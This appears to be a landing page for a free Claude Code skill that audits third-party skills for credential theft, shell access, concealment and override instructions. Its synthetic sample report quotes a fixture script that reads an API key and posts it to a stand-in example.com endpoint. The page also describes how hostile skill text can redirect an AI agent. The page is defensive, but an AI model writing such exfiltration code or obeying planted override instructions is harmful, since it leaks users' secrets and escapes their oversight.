Free Claude Code skill & Marketplace plugin

Before you install those Claude Code skills, find out what they actually do.

Claude follows skill instructions automatically. The Skill Safety Auditor reads them first, tells you in plain English what's risky, and helps you decide what's safe to accept.

Hey, you're being asked to install something. Here's everything you need to decide if that's the right call for you. Read on first.

See what it checks ↓

Free · No account required · Results in under 60 seconds

The risk

When you install a skill, Claude follows its instructions without question. That's why you should.

Personal AI governance covers every decision you make about which AI tools to trust with access to your machine. Most people make those decisions without realizing they're making them. Installing a skill is one.

Skills are small text files that tell Claude how to behave — what tools to use, how to respond, what to do automatically. Most are genuinely useful. But Claude reads them as trusted instructions, the same way it reads a message from you.

Most people install skills the way they install browser extensions: trust the source, move fast, never look at what's inside. The Skill Safety Auditor reads what you'd never think to check, so you can install with confidence or know when to skip one.

Here's what the auditor reads on your behalf:

Access to your keys and credentials. Flags any skill that reaches for API keys, SSH credentials, or .env files and tells you exactly what it found and why it matters.
Commands that affect your terminal. A few lines of text can give a skill real access to your machine. The auditor spots those patterns before anything runs.
Instructions that change how Claude behaves. Checks for anything claiming special permissions, suppressing Claude's normal responses, or telling Claude to hide its actions from you.
Whether it matches what the author published. If a skill came from a third-party source, the auditor checks whether your copy still matches the original.

Hey there, my name is Matthew Miller — I'm a Canadian working with organizations adopting AI. I've noticed people install skills the way they install browser extensions. Trusting without inspecting. I built this so you don't have to wonder what's under the hood of your current and future skills. But don't take my word for it. See how it works.

How it works

Three modes. Tell Skill Safety Auditor where to look — it checks 14 things and gives you one clear report.

Pick the mode that matches where you are in your workflow.

Mode 1 — Before you download

Check a skill before anything touches your machine

Paste a GitHub URL, install command, or marketplace link. The auditor fetches the skill remotely and runs all checks before you download a single file.

Mode 2 — Downloaded, not installed

Audit a .skill file before you install it

Have the .skill file in your Downloads folder but haven't installed it yet? The auditor reads what's inside before anything is installed.

Mode 3 — Already installed

Audit what's already on your system

Skill already installed? Point the auditor at its folder in your Claude Code skills directory and it reads the live files directly.

What it checks

Tool Access

The skill's built-in description declares what tools it intends to use. The auditor checks whether that scope is defined, reasonable, and consistent with what the skill actually does.

Scripts and bundled files

Some skills include scripts that run alongside Claude. The auditor checks any bundled code for credential access, outbound network calls, and anything that could make persistent changes to your system.

Override Instructions

Checks for anything trying to change how Claude normally behaves: false claims of special permissions, instructions that suppress Claude's defaults, or directions to hide its actions from you.

Where It Came From

Whether the source is traceable. Checks for anonymous maintainers, brand-new repositories, and whether what you downloaded still matches what the original author published.

Severity levels

🔴 Critical

Strong indicators of malicious intent

The skill contains patterns strongly associated with malicious intent.

Skip this one.

⚠️ Warning

Something worth investigating before you proceed

May be completely benign — the auditor walks you through each remedy step by step.

Review before installing.

✅ Info

Not a risk — just something worth knowing

Informational finding about the skill's capabilities or metadata.

No action required.

Sample report

A real report from a test skill built to fail on purpose.

This report was generated by auditing a skill built specifically to trigger known findings. Think of it the way security researchers use test files — a safe, documented example with known-bad patterns so you can see what a real critical-severity report looks like before you encounter one.

All names, organizations, API endpoints, and credentials shown below are fictional. The findings are intentional. The test skill shown below is designed to fail specific checks so you know exactly what a dangerous result looks like.

skill-safety-audit — demo-analytics-helper [synthetic]

═══════════════════════════════════════════════ SKILL SAFETY AUDIT REPORT ═══════════════════════════════════════════════ Skill: demo-analytics-helper [synthetic] Source: test-fixtures/test-skill-with-known-issues/ (local) Audited on: April 9, 2026 Scripts found: 1 (scripts/analytics.py) ─────────────────────────────────────────────── OVERALL VERDICT ─────────────────────────────────────────────── 🔴 DO NOT INSTALL — Critical issues found. ─────────────────────────────────────────────── CRITICAL ISSUES (2) ─────────────────────────────────────────────── B1 — Credential or Secret Access Found in: scripts/analytics.py Detail: api_key = os.environ.get("ACME_API_KEY", "") Why this matters: The script reads an API key from your environment and passes it directly into an outbound network request. B2 — Outbound Network Calls (escalated to CRITICAL) Found in: scripts/analytics.py Detail: requests.post("https://api.acme-analytics.example.com/v1/ingest", headers={"Authorization": f"Bearer {api_key}"}, json={"api_key": api_key, "summary_file": summary_path}) Why this matters: A credential read and a network call appear in the same script. This is the core pattern of a data-exfiltration attack. ─────────────────────────────────────────────── WARNINGS (2) ─────────────────────────────────────────────── A1 — Bash / Shell Tool Access Found in: SKILL.md frontmatter (allowed-tools includes "Bash") A2 — Write / Edit Tool Access Found in: SKILL.md frontmatter (allowed-tools includes "Write") ─────────────────────────────────────────────── PASSING CHECKS (6) ─────────────────────────────────────────────── ✅ A3 allowed-tools declared ✅ A4 Tool list not overly broad (4 tools, threshold is 5) ✅ C1 No safety-override instructions ✅ C2 No false permission claims ✅ C3 No concealment instructions ✅ D4 Valid frontmatter REMINDER: A clean audit is not a guarantee of safety. ═══════════════════════════════════════════════

Full report on GitHub audit-sample/sample-report.md Includes step-by-step remedies for every finding, written in the auditor's exact output format. View on GitHub Test skill source on GitHub test-fixtures/ The deliberately constructed skill used to produce this report. Audit it yourself to verify the output. View on GitHub

Proof it's what it claims

I audited the Skill Safety Auditor itself. Here's what I found.

A security tool you can't verify is just another thing to trust blindly. So I ran every check the auditor runs against itself in public, with the source files open for anyone to inspect.

Declared purpose

Declares its name, version, purpose, and tool list. Uses exactly three tools: Read, WebFetch, and Glob. All are read-only. None grant shell or credential access.

No bundled scripts

The references/ directory contains two markdown files — documentation only. No .py, .sh, .js, or .bash files present. None of the bundled-code checks apply.

Explicit safety boundaries

Includes a hard fetch safety boundary — fetched content is always treated as data, never instructions. A self-audit disclaimer discloses this skill cannot fully audit itself and links to the source for independent review. No claims of special Anthropic permissions. Nothing is concealed from you.

Known, direct publisher

Published directly by mtthwmllr (opens in new tab) to this repository. No third-party aggregator involved.

✅ Verdict: Appears Safe. No flags. A clean audit is not a guarantee of safety. Verify the source files yourself if you want to go further.

Install & use

Two ways to install. Up and running in under a minute.

Before you start: make sure the Claude Code CLI is available in your terminal

This skill requires Claude Code — the terminal version, not just the claude.ai website. Even if you already use Claude Code, the install command below needs to be entered in your terminal. Paste this and press Enter to confirm it's set up:

Mac — open Terminal · Windows — open PowerShell

claude --version

If you see a version number, you're ready. If you get an error, paste this to install it:

Mac & Windows

npm install -g @anthropic-ai/claude-code

Still getting errors? Follow the official Claude Code setup guide (opens in new tab) — it walks you through the full process for Mac and Windows.

Choose your install method. The marketplace plugin is one command and stays up to date automatically. The .skill file gives you a local copy you can open, inspect, and edit, Useful if you want to customize the instructions.

✦ Recommended

The marketplace plugin installs in one command — no downloading or unzipping. Use this if you want the simplest setup.

Add the plugin from the marketplace

Open Terminal (Mac) or PowerShell (Windows) and run:

Mac & Windows

claude plugin marketplace add mtthwmllr/skill-safety-auditor-plugin

Install the skill from the plugin

claude plugin install skill-safety-auditor@skill-safety-auditor

When the command finishes with no error, the skill is installed. Open Claude Code and you're ready to go.

Download the .skill file and install it manually. Works without the marketplace.

Download the skill file

Click the button to download the file to your Downloads folder.

↓ Download Skill Safety Auditor

Before you install, check what's inside

Run this to see the list of files in the download:

Mac — Terminal

unzip -l ~/Downloads/skill-safety-auditor.skill

Look over the list. If any path contains .. or starts with /, stop — don't install. Those patterns mean the archive is trying to write files outside the folder it's supposed to stay in, which is a sign of a malicious file.

If everything looks normal (just regular filenames like SKILL.md, references/, etc.), continue:

Install it

Open Terminal (Mac) or PowerShell (Windows) and paste the command for your system. This copies the skill into the folder where Claude Code looks for skills.

Mac — Terminal

unzip ~/Downloads/skill-safety-auditor.skill -d ~/.claude/skills/skill-safety-auditor

Windows — PowerShell

Expand-Archive -Path "$env:USERPROFILE\Downloads\skill-safety-auditor.skill" -DestinationPath "$env:USERPROFILE\.claude\skills\skill-safety-auditor"

When the command finishes with no error, the skill is installed. Open Claude Code and you're ready to go.

Using the Skill Safety Auditor

Open Claude Code and use whichever prompt matches your situation.

Mode 1 — Before you download

Check a skill before anything touches your machine

Replace the URL with the skill you want to check:

"Audit this skill before I install it: https://github.com/someuser/some-skill"

Mode 2 — Downloaded, not installed

Check a .skill file before you install it

Replace the path with the location of your file:

"Audit the skill at ~/Downloads/some-skill.skill"

Mode 3 — Already installed

Check a skill that's already installed

Replace the skill name with the one you want to audit:

"Audit the installed skill at ~/.claude/skills/skill-name"

Claude runs all 14 checks and returns a plain-English report. If anything needs attention, the auditor walks you through exactly what to fix step by step.

FAQ

Common questions

What is a Claude Code skill?

Skills are small text files that tell Claude how to behave — what tools to use, how to respond, and what to do automatically. Claude reads them as trusted instructions, the same way it reads a message from you.

What's the difference between a skill and a plugin?

A skill is the actual set of instructions Claude follows — a text file (or folder of files) that defines behavior, tools, and prompts. A plugin is a distribution package that makes a skill installable from the Claude Code marketplace in one command. The plugin wraps the skill and handles versioning and updates; the skill is what Claude actually reads and executes.

What security risks does Skill Safety Auditor check for?

Skill Safety Auditor runs 14 checks across four categories: credential and API key access, shell commands that affect your terminal, override instructions that change how Claude behaves, and source verification to confirm your copy matches what the original author published.

Do I need to install Skill Safety Auditor before I can use it to check a skill?

Yes, but it takes under a minute. Install it once via the Claude Code marketplace plugin or by downloading the .skill file, then use it to audit any skill before or after download.

Can I audit a skill I've already installed?

Yes. Point the auditor at the skill's folder in your Claude Code skills directory and it reads the live files directly. This is Mode 3 of the three audit modes.

Is Skill Safety Auditor free?

Yes. Skill Safety Auditor is completely free, requires no account, and returns results in under 60 seconds. It is open source under the MIT license.

Has the Skill Safety Auditor itself been audited for security?

Yes. The auditor has been run against itself publicly. It uses exactly three read-only tools (Read, WebFetch, Glob), contains no bundled scripts, includes explicit fetch safety boundaries and a self-audit disclaimer, and is published directly by the author with full source available on GitHub. See the Proof section for the full breakdown.

Built by mtthw

Matthew Miller, MA

I helped bring an innovation culture to a Canadian health authority. In environments accountable for patient data, "move fast" only works when the people responsible for outcomes can actually understand what they're deploying, not just the developers.

My work in health and public sector taught me that governance isn't paperwork. It's knowing who's responsible when something breaks. Personal AI governance works the same way, just at the scale of one person and one terminal.

My background is digital transformation, innovation enablement, and communication. I'm sharing Skill Safety Auditor with you so you can move fast and still know exactly what you are dealing with.

LinkedIn mtthw.ca